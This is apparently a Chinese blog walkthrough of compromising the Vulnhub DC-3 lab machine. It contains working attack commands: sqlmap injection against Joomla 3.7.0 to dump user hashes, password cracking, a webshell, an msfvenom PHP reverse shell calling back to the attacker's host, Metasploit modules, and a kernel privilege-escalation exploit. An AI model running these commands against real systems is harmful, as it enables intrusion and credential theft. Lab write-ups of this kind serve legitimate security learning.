Vulnhub靶机 DC-3 打靶 渗透详细过程

2024-04-22 909 0

Vulnhub靶机:DC-3打靶详情过程

一、将靶机配置导入到虚拟机

靶机下载地址:

https://download.vulnhub.com/dc/DC-3-2.zip

Vulnhub靶机 DC-3 打靶 渗透详细过程插图

二、攻击方式

主机发现

使用arp-scan命令进行主机发现,或者使用nmap也可以

Vulnhub靶机 DC-3 打靶 渗透详细过程插图1

Vulnhub靶机 DC-3 打靶 渗透详细过程插图2

信息收集-端口扫描

nmap -p- 10.1.2.148

Vulnhub靶机 DC-3 打靶 渗透详细过程插图3

只开放了80端口

服务探针

nmap -p80 -sV 10.1.2.148

Vulnhub靶机 DC-3 打靶 渗透详细过程插图4

访问web服务,来到web界面

Vulnhub靶机 DC-3 打靶 渗透详细过程插图5

目录爆破

发现网站管理后台等信息,结合浏览器插件发现使用joomla CMS,使用kali当中jooscn工具进行扫描,如果没有安装即可

Vulnhub靶机 DC-3 打靶 渗透详细过程插图6

目录信息:

Vulnhub靶机 DC-3 打靶 渗透详细过程插图7

扫描信息:

Vulnhub靶机 DC-3 打靶 渗透详细过程插图8

进入后台,需要管理员用户和密码:

Vulnhub靶机 DC-3 打靶 渗透详细过程插图9

搜索漏洞信息

根据前面信息收集到的内容,采用得CMS和版本信息,进行漏洞搜索,是否有可利用的漏洞

searchsploit Joomla 3.7.0

Vulnhub靶机 DC-3 打靶 渗透详细过程插图10

存在SQL注入漏洞

web渗透 - SQL注入

根据漏洞信息,进行漏洞利用,查看一下文件内容,尝试利用,sqlmap爆数据库

sqlmap -u "http://10.1.2.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch

//爆数据表
sqlmap -u "http://10.1.2.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -D joomladb --tables  -p list[fullordering] --batch
//爆数据表列的信息
sqlmap -u "http://10.1.2.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -D joomladb -T "#__users" --columns  -p list[fullordering] 
//爆数据内容

Vulnhub靶机 DC-3 打靶 渗透详细过程插图11

数据库信息:

Vulnhub靶机 DC-3 打靶 渗透详细过程插图12

数据表信息:

Vulnhub靶机 DC-3 打靶 渗透详细过程插图13

数据表当中列的信息:

Vulnhub靶机 DC-3 打靶 渗透详细过程插图14

用户名和密码:

Vulnhub靶机 DC-3 打靶 渗透详细过程插图15

登录管理后台

得到的密码为加密的,将密码保存到文本文件当中,使用john工具进行破解即可

john passwd.txt
密码为:
snoopy

Vulnhub靶机 DC-3 打靶 渗透详细过程插图16

得到用户名和密码进行登录后台

Vulnhub靶机 DC-3 打靶 渗透详细过程插图17

找上传点,或者可以查看代码的地方,找到扩展处功能处

Vulnhub靶机 DC-3 打靶 渗透详细过程插图18

点击新建文件即可,在html/处新建php文件,也可上传,但是不一定成功,可以创建文件后将代码复制进去。

Vulnhub靶机 DC-3 打靶 渗透详细过程插图19

反弹shell或getshell

接下来可进行反弹shell或获取webshell

//反弹shell,通过msf生成php反弹shell代码,msf端开启监听即可
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.1.2.206 LPORT=8888 -f raw -o cmd.php
//获取webshell
在html/处创建php文件,直接写入php一句话木马即可或者插入其他的php文件当中

Vulnhub靶机 DC-3 打靶 渗透详细过程插图20

此路径在前面的目录爆破当中以及暴露出来

Vulnhub靶机 DC-3 打靶 渗透详细过程插图22

访问此路径加上我们写好的php文件即可,即可反弹shell,即可监听到

Vulnhub靶机 DC-3 打靶 渗透详细过程插图23

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
exploit

Vulnhub靶机 DC-3 打靶 渗透详细过程插图24

成功接收到shell,为平台权限用户

Vulnhub靶机 DC-3 打靶 渗透详细过程插图25

msf自动化一步到位

方法二,直接使用msf,搜索joomla漏洞即可,尝试使用此模块sqli_rce

search joomla
use 6
set rhosts 10.1.2.148
exploit

Vulnhub靶机 DC-3 打靶 渗透详细过程插图26

直接得到shell,一步到位

Vulnhub靶机 DC-3 打靶 渗透详细过程插图27

切换到shell
获取稳定shell
python -c "import pty;pty.spawn('/bin/bash')"

Vulnhub靶机 DC-3 打靶 渗透详细过程插图28

提权

查找suid权限有无可利用
find / -perm -u=s -type f 2>/dev/null

Vulnhub靶机 DC-3 打靶 渗透详细过程插图29

发现有at,可以尝试提权,但是未果

Vulnhub靶机 DC-3 打靶 渗透详细过程插图30

Vulnhub靶机 DC-3 打靶 渗透详细过程插图31

查看/etc文件下有无可利用的
ls -l /etc/passwd
看来也无可用的

Vulnhub靶机 DC-3 打靶 渗透详细过程插图32

Vulnhub靶机 DC-3 打靶 渗透详细过程插图33

//内核漏洞检索,漏洞利用
searchsploit Ubuntu 16.04

Vulnhub靶机 DC-3 打靶 渗透详细过程插图34

查看这一条跟此系统比较吻合,查看一下

Vulnhub靶机 DC-3 打靶 渗透详细过程插图35

//查看一下详情
searchsploit -x linux/local/39772.txt
//将文件下载到本地,通过meterpreter 上传
meterpreter > upload /opt/39772.zip exp.zip //自定义名称,当前目录

Vulnhub靶机 DC-3 打靶 渗透详细过程插图36

下载完成后,解压即可,按照上述文件内容直接执行即可

Vulnhub靶机 DC-3 打靶 渗透详细过程插图37

Vulnhub靶机 DC-3 打靶 渗透详细过程插图38

成功完成

Vulnhub靶机 DC-3 打靶 渗透详细过程插图39

文章不妥之处,欢迎批评指正!


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论